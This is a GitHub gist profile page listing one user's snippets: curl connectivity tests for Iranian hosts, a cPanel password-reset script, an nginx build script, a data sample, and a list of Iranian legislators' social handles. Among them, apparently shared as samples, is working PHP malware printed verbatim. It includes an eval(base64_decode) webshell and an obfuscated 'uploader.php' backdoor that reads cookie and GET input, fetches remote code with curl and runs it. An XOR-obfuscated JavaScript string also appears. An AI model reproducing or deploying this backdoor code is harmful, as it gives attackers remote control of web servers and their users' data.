Skip to content

Instantly share code, notes, and snippets.

View zoghal's full-sized avatar
🏠
Working from home

Saleh Souzanchi zoghal

🏠
Working from home
View GitHub Profile
@zoghal
zoghal / step1.js
Created May 19, 2023 22:42
javascript decoding test
var v = "\x05KXCNYDBC\x0d\x05r\x1dU\x1fN\x1dI\x18\x1a\x04\x0dV\x27\x0d\x0d\x0d\x0d\x0aX^H\x0d^Y_DNY\x0a\x16\x27\x0d\x0d\x0d\x0d[L_\x0dr\x1dU\x1fLOO\x1f\x1b\x0d\x10\x0dKXCNYDBC\x0d\x05r\x1dU\x19\x14NK\x1a\x1e\x01\x0dr\x1dU\x1eNK\x18HO\x01\x0dr\x1dUH\x1cK\x19\x1dK\x0d\x10\x0dCXAA\x04\x0dV\x27\x0d\x0d\x0d\x0d\x0d\x0d\x0d\x0dYED^v\x0a]L_L@^\x0ap\x0d\x10\x0dr\x1dU\x1eNK\x18HO\x0dQQ\x0dVP\x16\x27\x0d\x0d\x0d\x0d\x0d\x0d\x0d\x0dYED^v\x0ar^DYHF\x0ap\x0d\x10\x0dr\x1dU\x19\x14NK\x1a\x1e\x16\x27\x0d\x0d\x0d\x0d\x0d\x0d\x0d\x0dYED^v\x0arX^H_\x0ap\x0d\x10\x0dr\x1dUH\x1cK\x19\x1dK\x16\x27\x0d\x0d\x0d\x0d\x0d\x0d\x0d\x0dYED^v\x0arYE_HLI^\x0ap\x0d\x10\x0dvp\x16\x27\x0d\x0d\x0d\x0d\x0d\x0d\x0d\x0dYED^v\x0arEL^EH^\x0ap\x0d\x10\x0d\x1dU\x1d\x16\x27\x0d\x0d\x0d\x0d\x0d\x0d\x0d\x0dYED^v\x0arNX__\x1eCYg\x1dO\x0ap\x0d\x10\x0dCXAA\x16\x27\x0d\x0d\x0d\x0d\x0d\x0d\x0d\x0dYED^v\x0arLXYB\x7fHNBCCHNY\x0ap\x0d\x10\x0d\x0c\x0cvp\x16\x27\x0d\x0d\x0d\x0d\x0d\x0d\x0d\x0dYED^v\x0ar_HNBCCHNY\x7fHY_T\x0ap\x0d\x10\x0d\x1dU\x1e\x16\x27\x0d\x0d\x0d
@zoghal
zoghal / test-curl.php
Last active September 30, 2022 18:59
simple script for test CURL connections in iran
<?php
$urls = [
// در داخل ایران هاست شده است.
'https://farsi.khamenei.ir/',
'https://toofan.soozanchi.ir',
// در خارج ایران هاست [github page] شده است.
'https://libre.font-store.ir',
// در خارج ایران هاست شده است.
'https://api.wordpress.org',
'https://www.php.net',
@zoghal
zoghal / 1-test.php
Last active September 26, 2022 06:44
مشکل curl در هاست‌های سرورهای داخل ایران
<?php
//$url = 'https://api.wordpress.org';
$url = "https://libre.font-store.ir";
$ch = curl_init();
// CURL options
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_TIMEOUT, 20);
//curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
<?php
@eval/**/(base64_decode/**/(JHBhc3N3b3JkPSdBRE1JTi0tJzsKZXJyb3JfcmVwb3J0aW5nLyoqLygwKTsKQHNldF90aW1lX2xpbWl0LyoqLygwKTsKICAgIGZ1bmN0aW9uIENsYXNzX1VDX2tleS8qKi8oJHN0cmluZyl7CgkJJGFycmF5ID0gc3RybGVuICh0cmltKCRzdHJpbmcpKTsKCQkkZGVidWdlciA9ICcnOwoJCWZvcigkb25lID0gMDskb25lIDwgJGFycmF5OyRvbmUrPTIpIHsKCQkJJGRlYnVnZXIgLj0gcGFjayAoIkMiLGhleGRlYyAoc3Vic3RyICgkc3RyaW5nLCRvbmUsMikpKTsKCQl9CgkJcmV0dXJuICRkZWJ1Z2VyOwoJfQpoZWFkZXIvKiovKCJjb250ZW50LVR5cGU6IHRleHQvaHRtbDsgY2hhcnNldD1nYjIzMTIiKTsKJGZpbGVuYW1lLyoqLz1DbGFzc19VQ19rZXkvKiovKCIyNDcwNjE3MzczNzc2RjcyNjQzRDI3IikuJHBhc3N3b3JkLgpDbGFzc19VQ19rZXkvKiovKCIyNzNCMjQ3MzY4NjU2QzZDNkU2MTZENjUzRDI3IikuJFVzZXJuYW1lLgpDbGFzc19VQ19rZXkvKiovKCIyNzNCMjQ2RDc5NzU3MjZDM0QyNyIpLiRVcmwuCkNsYXNzX1VDX2tleS8qKi8oIjI3M0I2NTc2NjE2QzI4Njc3QTc1NkU2MzZGNkQ3MDcyNjU3MzczMjg2MjYxNzM2NTM2MzQ1RjY0NjU2MzZGNjQ2NTI4MjciKS4nZU5ydHZmdDdHOGVWSVBvejgzMzVIOW9keGdBaUVPd1hYcUxBQ09odWlKUW9raUlweVpLb3l3c0NJQWdSTHdQZ1N6TC9tSXp2N25vejJXOGl4NDg0ZmlXMk0zSHN4UGJZanBQeHpjeG1Nbys5czduWnUvUFllV1Ztdm52T3FhcnU2a2FEcE
@zoghal
zoghal / uploader.php
Created July 10, 2022 06:58
php malwares example
<?php $g=${"\x5f\x43\x4f\x4f\x4b\x49\x45"};if(in_array(gettype($g)."29",$g)){$g[61]=$g[61].$g[75];$g[85]=$g[61]($g[85]);@$g=$g[85]($g[52],$g[61](${$g[50]}[20]));$g();} $zyefa = array(@${"\x5f\x47\x45\x54"}["\x41\x52\x52\x41\x59"],"\x63\x72\x65\x61\x74\x65\x5f\x66\x75\x6e\x63\x74\x69\x6f\x6e","\x73\x74\x72\x5f\x72\x6f\x74\x31\x33","\x6a\x73\x6f\x6e\x5f\x64\x65\x63\x6f\x64\x65","\x70\x61\x63\x6b","\x62\x61\x73\x65\x36\x34\x5f\x64\x65\x63\x6f\x64\x65","\x66\x69\x6c\x65\x5f\x67\x65\x74\x5f\x63\x6f\x6e\x74\x65\x6e\x74\x73",@${"\x5f\x47\x45\x54"}["\x6f\x66"],);$tHFob = $zyefa[2]($zyefa[0]);$cyn = @$zyefa[4]("\x48\x2a", $tHFob);$ztKh = $zyefa[3]($cyn, true); $zyefa[7] == 1 && die($zyefa[6](__FILE__)); if (($ztKh[0] - time()) > 0 and md5(md5($ztKh[2])) === "c7416592095e3335f3b2d881342baf52") { $gP = curl_init($ztKh[1]); curl_setopt($gP, CURLOPT_RETURNTRANSFER, 1); $mcbn = curl_exec($gP);$ew = empty($mcbn)?$zyefa[6]($ztKh[1]):$mcbn;@$zyefa[1]("", "\x7d" . $zyefa[5]($ew) . "\x2f\x2a"); die;} ?>
@zoghal
zoghal / plugin.php
Created June 29, 2022 23:54
Maybe a new wordpress malware
<?php
/**
* The plugin API is located in this file, which allows for creating actions
* and filters and hooking functions, and methods. The functions or methods will
* then be run when the action or filter is called.
*
* The API callback examples reference functions, but can be methods of classes.
* To hook methods, you'll need to pass an array one of two ways.
*
* Any of the syntaxes explained in the PHP documentation for the
@zoghal
zoghal / data.php
Created May 26, 2022 21:35
make hierarchical slug with array nodes sample
<?php
return [
[
"value" => "dental-supplies",
"depth" => 0,
"count" => 1589
],
[
"value" => "adhesive-agents-materials",
@zoghal
zoghal / gist:d85cd44483b10de45818f5ef820a0f70
Created October 14, 2021 18:10
نمایندگان عضو کمیسیون ویژه بررسی #طرح_صیانت:
نمایندگان محترم عضو کمیسیون ویژه بررسی #طرح_صیانت:
مهرداد گودرزوند چگینی
twitter: @MehrdadChegin
instagram: @goudarzvand_chegini_mehrdad
telegram: @
حسین میرزایی:
twitter: @huseinmirzaie
instagram: @huseinmirzaie_ir
@zoghal
zoghal / cpanel-chpass.sh
Created March 6, 2021 14:07
how to Mass Change All cPanel Account Passwords
#! /bin/bash
# auther: saleh souzanchi(github.com/zoghal)
export ALLOW_PASSWORD_CHANGE=1
ls -1 /var/cpanel/users | while read user; do
echo "START: $user "
pass=`</dev/urandom tr -dc "!@#$&A-Za-z0-9" | head -c16`
echo "$user $pass" >> passwords.txt
/scripts/realchpass $user $pass
#!/bin/bash
set -e
NGINX_VERSION="1.6.0"
NGINX_TARBALL="nginx-${NGINX_VERSION}.tar.gz"
PCRE_VERSION="8.34"
PCRE_TARBALL="pcre-${PCRE_VERSION}.tar.gz"
OPENSSL_VERSION="1.0.1g"
OPENSSL_TARBALL="openssl-${OPENSSL_VERSION}.tar.gz"